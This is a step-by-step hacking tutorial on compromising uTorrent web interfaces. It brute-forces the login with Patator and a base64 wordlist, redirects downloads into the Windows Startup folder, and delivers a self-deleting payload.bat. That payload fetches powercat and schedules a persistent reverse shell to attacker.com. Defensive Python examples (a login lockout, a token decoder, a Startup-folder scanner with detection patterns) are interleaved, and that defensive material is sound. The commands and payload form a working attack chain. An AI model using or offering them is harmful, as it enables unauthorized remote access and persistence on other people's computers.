Compromised uTorrent clients can be misused to download a malicious torrent file. The malicious file is designed to plant and execute a persistent backdoor when Windows 10 is restarted, giving the attacker remote access to the operating system at will. But there are a few ways to avoid becoming a target.
Torrent clients such as uTorrent and Transmission have built-in functions that let server administrators access the torrent client remotely through a web application interface, as shown in the uTorrent web app example below.
In general, the number of publicly accessible torrent clients is growing. As torrent clients grow in popularity, so does the number of poorly configured and insecure services. Like all web apps, these clients can be attacked in various ways. For example, in recent years numerous directory traversal, privilege escalation and cross-site scripting vulnerabilities have been disclosed, as shown in the image below. In the future, attackers might discover ways to bypass authentication entirely.
Understanding the attack
So a torrent client gets hacked ... what is the worst thing an attacker can do? Pirate some copyrighted material? Well, it gets worse. Torrent clients can create files and folders on the system and replace existing files. That access to the file system can be misused by downloading malicious files through the compromised torrent client.
For example, an attacker could download an executable file or script into the Startup folder on a Windows 10 computer, as shown in the GIF below. Windows runs every file it finds in the Startup folder without user interaction, every time the server or computer is restarted.
Linux systems are equally vulnerable to such attacks, but they are beyond the scope of the demonstration here. The .bashrc file found on most Linux systems is essentially a Bash script that runs every time a new terminal is opened or an SSH login is established. An attacker could use the compromised torrent client to download a malicious .bashrc file, replacing the original file on the server. The attacker's .bashrc would then run whenever someone successfully logs on to the server.
This article shows how uTorrent web apps can be brute-forced and used to download a PowerShell script into the Windows 10 Startup folder. The PowerShell script is designed to plant a persistent backdoor and remove itself immediately once finished.
Step 1: Brute Force the Login with Patator
Patator is a brute-forcing tool, like Hydra, Medusa, and Burp's Intruder module. Using Patator to brute-force web app logins is very similar to brute-forcing router gateways. My previous article, "Break in Router Gateways with Patator", describes the command line and examples in detail.
1. Install Patator
~# apt-get update && apt-get install patator
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following NEW packages will be installed:
  ca-certificates-java default-jre default-jre-headless fonts-dejavu-extra freerdp2-x11 ike-scan java-common ldap-utils libatk-wrapper-java libatk-wrapper-java-jni libfreerdp-client2-2 libfreerdp2-2 libgif7 libwinpr2-2 openjdk-11-jre openjdk-11-jre-headless patator python3-ajpy python3-bcrypt python3-dnspython python3-ipy python3-mysqldb python3-naclon python python3-paramiko python3-psycopg2 unzip
0 upgraded, 27 newly installed, 0 to remove and 0 not upgraded.
Need to get 43.9 MB of archives.
After this operation, 192 MB of additional disk space will be used.
Do you want to continue? [Y/n] Y
2. Record a login request with Burp's proxy
Open Firefox and Burp Suite. Configure Firefox to proxy requests through Burp and record the login request. Replace the base64-encoded string that follows "Authorization: Basic" with "FILE0", right-click the request and choose the "Copy to file" option. The FILE0 string acts as a placeholder for the Patator wordlist. Save the request in the /tmp folder under the file name "utorrent_request.txt".
3. Generate a targeted word list
Hashes.org has published wordlists of cracked passwords collected over the last two years. The 2018 wordlist, highlighted in the image below, can be downloaded from the website. That is the one used as an example in this guide.
Unpack the archive with the 7z x archive.7z command, where archive.7z is the path and file name of the compressed file you downloaded. For example:
~# 7z x /root/Downloads/hashes.org-2018.7z

7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,4 CPUs Intel(R) Core(TM) i7-4770HQ CPU @ 2.20GHz (40661),ASM,AES-NI)

Scanning the drive for archives:
1 file, 1424620615 bytes (1359 MiB)

Extracting archive: /root/Downloads/hashes.org-2018.7z
--
Path = /root/Downloads/hashes.org-2018.7z
Type = 7z
Physical Size = 1424620615
Headers Size = 142
Method = LZMA:24
Solid = -
Blocks = 1

Everything is Ok

Size:       6429547050
Compressed: 1424620615
Then base64-encode each line of the wordlist, prefixed with the username. The username "admin" is the default for uTorrent web apps. Replace "./hashes.org-2018.txt" with the location and name of your downloaded wordlist.
~# while read -r password; do printf 'admin:%s' "$password" | base64; done < ./hashes.org-2018.txt >> ./base64_wordlist.txt
In my tests against uTorrent version 3.5.5 on Windows 10, no blacklist or rate limiting appeared to be triggered by hundreds of thousands of failed login attempts. It seems that uTorrent allows an unlimited number of login attempts over a long period.
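The observation above is the defender's real problem: a login endpoint that never locks or slows a source. As an added example that is not part of the original article, the following Python sketch shows the control that would have stopped the attempt-rate described here: a per-source sliding window of failures that triggers a temporary lockout. The class name, thresholds and the 198.51.100.7 / 10.0.0.x source addresses are constructed for the demonstration, not anything uTorrent implements.

```python
from collections import deque


class LoginGuard:
    """Per-source failure counter with a sliding window and temporary lockout.

    Constructed example: after max_failures failed attempts from one source
    within `window` seconds, that source is locked out for `lockout` seconds.
    A successful login clears the failure history for that source.
    """

    def __init__(self, max_failures=5, window=60.0, lockout=300.0):
        self.max_failures = max_failures
        self.window = window
        self.lockout = lockout
        self._failures = {}      # source -> deque of failure timestamps
        self._locked_until = {}  # source -> time at which the lockout ends

    def check(self, source, now):
        """Return True if an attempt from `source` may proceed at time `now`."""
        return now >= self._locked_until.get(source, 0.0)

    def record(self, source, success, now):
        """Record an attempt's outcome; returns 'ok', 'failed' or 'locked'."""
        if not self.check(source, now):
            return "locked"
        if success:
            self._failures.pop(source, None)
            return "ok"
        q = self._failures.setdefault(source, deque())
        q.append(now)
        # Drop failures that fell out of the sliding window.
        while q and now - q[0] > self.window:
            q.popleft()
        if len(q) >= self.max_failures:
            self._locked_until[source] = now + self.lockout
            q.clear()
            return "locked"
        return "failed"


def simulate_burst(guard, source, attempts, start=0.0, interval=0.001):
    """Feed `attempts` failures at brute-force speed; return how many got through."""
    allowed = 0
    for i in range(attempts):
        now = start + i * interval
        if guard.check(source, now):
            allowed += 1
            guard.record(source, False, now)
    return allowed


if __name__ == "__main__":
    g = LoginGuard()
    # Ten thousand candidates at ~1000 req/s: only the first five reach the password check.
    print("attempts that reached the password check:", simulate_burst(g, "198.51.100.7", 10000))
```

The point of the sliding window rather than a lifetime counter is that an ordinary user who mistypes a password a few times spread over an hour is never locked out, while a tool firing a wordlist at hundreds of requests per second is stopped after the first handful.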
Use the patator command below with the utorrent_request.txt file created earlier to brute-force the uTorrent web login. Make sure you adjust the paths below to the correct folders, because yours may differ.
~# patator http_fuzz raw_request=/tmp/utorrent_request.txt accept_cookie=1 follow=1 0=./base64_wordlist.txt
16:31:45 patator    INFO - Patator v0.7 (https://github.com/lanjelot/patator) starting on 2020-01-29 16:31 EST
To break down that command:
- raw_request= – Use the utorrent_request.txt created in an earlier step to generate login attempts against the web app.
- accept_cookie= – Save any cookies received for use in subsequent requests.
- follow= – Follow location redirects for both failed and successful login attempts when the server instructs it.
- 0= – The "FILE0" placeholder in utorrent_request.txt is iterated through the supplied password list.
After executing the command, my output looks like this:
code size:clen       time | candidate                        |   num | mesg
-----------------------------------------------------------------------------
401 159:0           0.004 | YWRtaW46ISEhbWFmZWlmZWkxMjM0NQ== |  9902 | HTTP/1.1 401 Unauthorized
401 159:0           0.000 | YWRtaW46ISEhbWFydGluYTk1         |  9912 | HTTP/1.1 401 Unauthorized
401 159:0           0.000 | YWRtaW46ISEhbWVpbnMhISE=         |  9922 | HTTP/1.1 401 Unauthorized
401 159:0           0.007 | YWRtaW46ISEhbWljaCEhIQ==         |  9932 | HTTP/1.1 401 Unauthorized
401 159:0           0.001 | YWRtaW46ISEhbW9t                 |  9942 | HTTP/1.1 401 Unauthorized
401 159:0           0.000 | YWRtaW46ISEhbmFpY3VMISEh         |  9952 | HTTP/1.1 401 Unauthorized
401 159:0           0.000 | YWRtaW46ISEhbmV3d2F2ZQ==         |  9962 | HTTP/1.1 401 Unauthorized
401 159:0           0.000 | YWRtaW46ISEhbm93YXk=             |  9972 | HTTP/1.1 401 Unauthorized
401 159:0           0.000 | YWRtaW46ISEhb29vNTIx             |  9982 | HTTP/1.1 401 Unauthorized
401 159:0           0.000 | YWRtaW46ISEhcGluayEhIQ==         |  9992 | HTTP/1.1 401 Unauthorized
401 159:0           0.000 | YWRtaW46ISEhbWFyeTEyMw==         |  9913 | HTTP/1.1 401 Unauthorized
401 159:0           0.000 | YWRtaW46ISEhbWVsbDI3ODE=         |  9923 | HTTP/1.1 401 Unauthorized
401 159:0           0.001 | YWRtaW46ISEhbWljaGVsbGU=         |  9933 | HTTP/1.1 401 Unauthorized
401 159:0           0.000 | YWRtaW46ISEhbW9uZXk=             |  9943 | HTTP/1.1 401 Unauthorized
401 159:0           0.000 | YWRtaW46ISEhbmFtYXN0ZTIy         |  9953 | HTTP/1.1 401 Unauthorized
401 159:0           0.000 | YWRtaW46ISEhbmlhaXdvYnU=         |  9963 | HTTP/1.1 401 Unauthorized
401 159:0           0.000 | YWRtaW46ISEhbndseTAy             |  9973 | HTTP/1.1 401 Unauthorized
401 159:0           0.000 | YWRtaW46ISEhb3N0YXAhISE=         |  9983 | HTTP/1.1 401 Unauthorized
401 159:0           0.000 | YWRtaW46ISEhcGlwa2EyMDA0ISEh     |  9993 | HTTP/1.1 401 Unauthorized
401 159:0           0.000 | YWRtaW46ISEhbWFzY3VsaW5vISEh     |  9915 | HTTP/1.1 401 Unauthorized
401 159:0           0.000 | YWRtaW46ISEhbWVuZzEyMw==         |  9925 | HTTP/1.1 401 Unauthorized
401 159:0           0.000 | YWRtaW46ISEhbWluaW9uNTg=         |  9935 | HTTP/1.1 401 Unauthorized
401 159:0           0.000 | YWRtaW46ISEhbXVja2VsMDgxNQ==     |  9945 | HTTP/1.1 401 Unauthorized
401 159:0           0.000 | YWRtaW46ISEhbmFuZGExOTk1         |  9955 | HTTP/1.1 401 Unauthorized
401 159:0           0.000 | YWRtaW46ISEhbmlja2k=             |  9965 | HTTP/1.1 401 Unauthorized
401 159:0           0.000 | YWRtaW46ISEhbzc3M2g=             |  9975 | HTTP/1.1 401 Unauthorized
200 42340:42176     0.073 | YWRtaW46UGFTU3dvUkRAMTIzNA==     |  9985 | HTTP/1.1 200 OK
401 159:0           0.004 | YWRtaW46ISEhcG9wOTI=             |  9995 | HTTP/1.1 401 Unauthorized
Hits/Done/Skip/Fail/Size: 10000/10000/0/0/10000, Avg: 1607 r/s, Time: 0h 0m 6s
Failed login attempts can be filtered out. A successful candidate can be decoded with base64. For example:
~# base64 -d <<< 'YWRtaW46UGFTU3dvUkRAMTIzNA=='
admin:PaSSwoRD@1234
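What the step above relies on is that HTTP Basic authentication is not encryption: the token after "Authorization: Basic" is just base64 of "user:password", which anyone holding a captured header (or the tool output) can reverse. As an added example, not code from the original article, the following Python shows the transformation in both directions and picks the successful candidate out of Patator-style output. The sample lines are constructed to match the output format shown above; the function names are this example's own.

```python
import base64
import re

# Constructed sample in the format of the Patator http_fuzz output shown above.
# Each candidate is base64("admin:<password>"), exactly as the wordlist loop builds it.
SAMPLE_OUTPUT = """\
401 159:0           0.004 | YWRtaW46ISEhbWFmZWlmZWkxMjM0NQ== |  9902 | HTTP/1.1 401 Unauthorized
200 42340:42176     0.073 | YWRtaW46UGFTU3dvUkRAMTIzNA==     |  9985 | HTTP/1.1 200 OK
401 159:0           0.004 | YWRtaW46ISEhcG9wOTI=             |  9995 | HTTP/1.1 401 Unauthorized
"""


def basic_auth_token(username: str, password: str) -> str:
    """Build the value that follows 'Authorization: Basic': base64 of 'user:pass'."""
    return base64.b64encode(f"{username}:{password}".encode()).decode()


def decode_basic_token(token: str) -> tuple:
    """Reverse of basic_auth_token: decode and split 'user:pass' at the first colon."""
    user, _, password = base64.b64decode(token).decode(errors="replace").partition(":")
    return user, password


# status, size:clen, time, '|', candidate, '|' ... as laid out in the output above.
RESULT_RE = re.compile(r"^(?P<code>\d{3})\s+\S+\s+\S+\s+\|\s+(?P<candidate>\S+)\s+\|")


def successful_candidates(output: str) -> list:
    """Return (user, password) for every result line whose HTTP status is 200."""
    found = []
    for line in output.splitlines():
        m = RESULT_RE.match(line)
        if m and m.group("code") == "200":
            found.append(decode_basic_token(m.group("candidate")))
    return found


if __name__ == "__main__":
    print(basic_auth_token("admin", "PaSSwoRD@1234"))
    print(successful_candidates(SAMPLE_OUTPUT))
```

The defensive takeaway is the one the decode makes obvious: if the web UI is reachable over plain HTTP, every legitimate login also carries the password in this reversible form, so putting the interface behind TLS (or not exposing it at all) matters as much as the password strength.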
Step 2: Change the default download folder
After gaining access to the torrent client, if there are no active downloads, simply add a torrent file and click the "General" tab to identify the username on the Windows system. The torrent can be removed once the username is discovered.
Open "Preferences" and click the "Directories" tab. Check the "Put new downloads in" box and enter the following Startup folder path:
C:\Users\<username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
Make sure that you have replaced <username> with the Windows 10 username.
The PowerShell script (payload.bat) establishes a persistent backdoor with the schtasks command and then removes the evidence of itself from the Startup folder.
This is just one example of a PowerShell payload. Such a script can perform a wide range of automated attacks, such as sensitive file exfiltration, live streaming of the desktop, password dumping and turning the device into a web proxy.
There are several lines in the PowerShell payload below. Comments have been added to explain what each line does.
# A new folder named "Windows" is created in an attempt to
# hide a malicious script.
mkdir "C:\Users\$env:username\Windows"

# Invoke-WebRequest is used to download Powercat, a Netcat-like
# PowerShell module. The Powercat script is saved into the
# new "Windows" folder.
iwr 'https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1' -O C:\Users\$env:username\Windows\powercat.ps1

# The schtasks command is executed to create a new scheduled task
# called "backdoor". The task imports the Powercat script
# and tries to establish a TCP connection to the attacker's system
# every time the Windows 10 computer becomes idle.
schtasks /create /f /tn backdoor /tr 'powershell /w 1 -ep bypass /C ipmo C:\Users\$env:username\Windows\powercat.ps1; powercat -c attacker.com -p 9999 -e powershell' /sc onidle /i 1

# The payload.bat is deleted from the Startup folder.
rm C:\Users\$env:username\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\payload.bat
Create a folder named "torrent" with the mkdir command.
~# mkdir torrent/
Change into the new folder.
~# cd torrent/
~/torrent#
The above payload is condensed into one line, chained together with semicolons, so that Windows 10 executes all of the desired code as a single command.
Use nano to create a new "payload.bat" file:
~/torrent# nano payload.bat
And save the PowerShell one-liner below in the file:
powershell -ep bypass /w 1 "& mkdir C:\Users\$env:username\Windows; iwr 'https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1' -O C:\Users\$env:username\Windows\powercat.ps1; schtasks /create /f /tn backdoor /tr 'powershell /w 1 -ep bypass /C ipmo C:\Users\$env:username\Windows\powercat.ps1; powercat -c attacker.com -p 9999 -e powershell' /sc onidle /i 1; rm C:\Users\$env:username\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\payload.bat"
Note the backtick (`) in the "Start` Menu" file path. This is not a typo. The backtick is PowerShell's escape character and is used here to escape the space in the path.
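The payload described above leaves a recognisable fingerprint: an execution-policy bypass, a hidden window, a download from a remote host, a scheduled task with an idle trigger, a Netcat-style tool, and a self-delete aimed at the Startup folder. As an added example that is not part of the original article, the following Python scanner flags scripts in a Startup folder that combine two or more of those traits. The indicator names, the two sample files and the hosts example.invalid are constructed for the demonstration; the only real paths involved are the ones passed to scan_startup_dir by the caller.

```python
import re
import tempfile
from pathlib import Path

# (indicator name, pattern). Each trait on its own is common in legitimate scripts;
# the scan reports files that combine several of them.
INDICATORS = [
    ("exec-policy-bypass", re.compile(r"-ep\s+bypass|-ExecutionPolicy\s+bypass", re.I)),
    ("hidden-window", re.compile(r"(?:^|\s)[-/]w\s+1\b|-WindowStyle\s+hidden", re.I)),
    ("remote-download", re.compile(r"\b(?:iwr|Invoke-WebRequest|curl|wget)\b", re.I)),
    ("scheduled-task-create", re.compile(r"\bschtasks\b.*?/create", re.I)),
    ("idle-trigger", re.compile(r"/sc\s+onidle", re.I)),
    ("reverse-shell-tool", re.compile(r"\bpowercat\b|\bnc(?:at)?\b.*-e\s", re.I)),
    ("self-delete", re.compile(r"\b(?:rm|del|Remove-Item)\b.*\bStartup\b", re.I)),
]

SCRIPT_SUFFIXES = {".bat", ".cmd", ".ps1", ".vbs", ".js"}

# Constructed sample modelled on the one-liner above (hosts replaced with example.invalid).
SUSPICIOUS_SAMPLE = (
    'powershell -ep bypass /w 1 "& iwr \'https://example.invalid/tool.ps1\' -O C:\\tmp\\tool.ps1; '
    "schtasks /create /f /tn updater /tr 'powershell /w 1 -ep bypass /C ipmo C:\\tmp\\tool.ps1; "
    "powercat -c example.invalid -p 9999 -e powershell' /sc onidle /i 1; "
    'rm C:\\Users\\$env:username\\AppData\\Roaming\\Microsoft\\Windows\\Start` Menu\\Programs\\Startup\\payload.bat"'
)

# Constructed benign Startup script: launches a local program, nothing else.
BENIGN_SAMPLE = '@echo off\r\nstart "" "C:\\Program Files\\Vendor\\Updater.exe"\r\n'


def scan_text(text):
    """Return the names of every indicator that matches the script text, in list order."""
    return [name for name, rx in INDICATORS if rx.search(text)]


def scan_startup_dir(startup_dir, min_hits=2):
    """Scan script files directly under startup_dir; return {filename: [indicators]}
    for files with at least min_hits matching indicators."""
    hits = {}
    for p in Path(startup_dir).iterdir():
        if p.is_file() and p.suffix.lower() in SCRIPT_SUFFIXES:
            names = scan_text(p.read_text(errors="replace"))
            if len(names) >= min_hits:
                hits[p.name] = names
    return hits


def demo_scan():
    """Build a throwaway Startup folder with the constructed samples and scan it."""
    with tempfile.TemporaryDirectory() as d:
        Path(d, "payload.bat").write_text(SUSPICIOUS_SAMPLE)
        Path(d, "vendor.bat").write_text(BENIGN_SAMPLE)
        Path(d, "desktop.ini").write_text("[.ShellClassInfo]")  # not a script, skipped
        return scan_startup_dir(d)


if __name__ == "__main__":
    for name, indicators in demo_scan().items():
        print(f"{name}: {', '.join(indicators)}")
```

On a real host, point scan_startup_dir at both the per-user path (the one the article has the torrent client write to) and the all-users path under C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp. Bear in mind that the script deletes itself once it has run, so an empty Startup folder proves nothing; the scheduled task is the artefact that persists, and `schtasks /query /fo LIST /v` listing a task with an "On idle" trigger that launches PowerShell is the corresponding check.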
Install the qBittorrent client from a new terminal window in Kali. Most torrent applications support torrent creation, but the Transmission GTK client could not create the .torrent file in my tests, so it is not recommended.
~# apt-get update && apt-get install qbittorrent
Hit:1 https://mirrors.ocf.berkeley.edu/kali kali-rolling InRelease
Reading package lists... Done
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following NEW packages will be installed:
  libboost-random1.67.0 libtorrent-rasterbar9 qbittorrent
0 upgraded, 3 newly installed, 0 to remove and 185 not upgraded.
Need to get 7,051 kB of archives.
After this operation, 15.2 MB of additional disk space will be used.
Do you want to continue? [Y/n]
Open qBittorrent. Click "Tools" in the menu bar and then "Torrent Creator" to open the Torrent Creator window.
Set the path to the payload.bat file, check the "Start seeding immediately" box, add tracker URLs and click the "Create Torrent" button.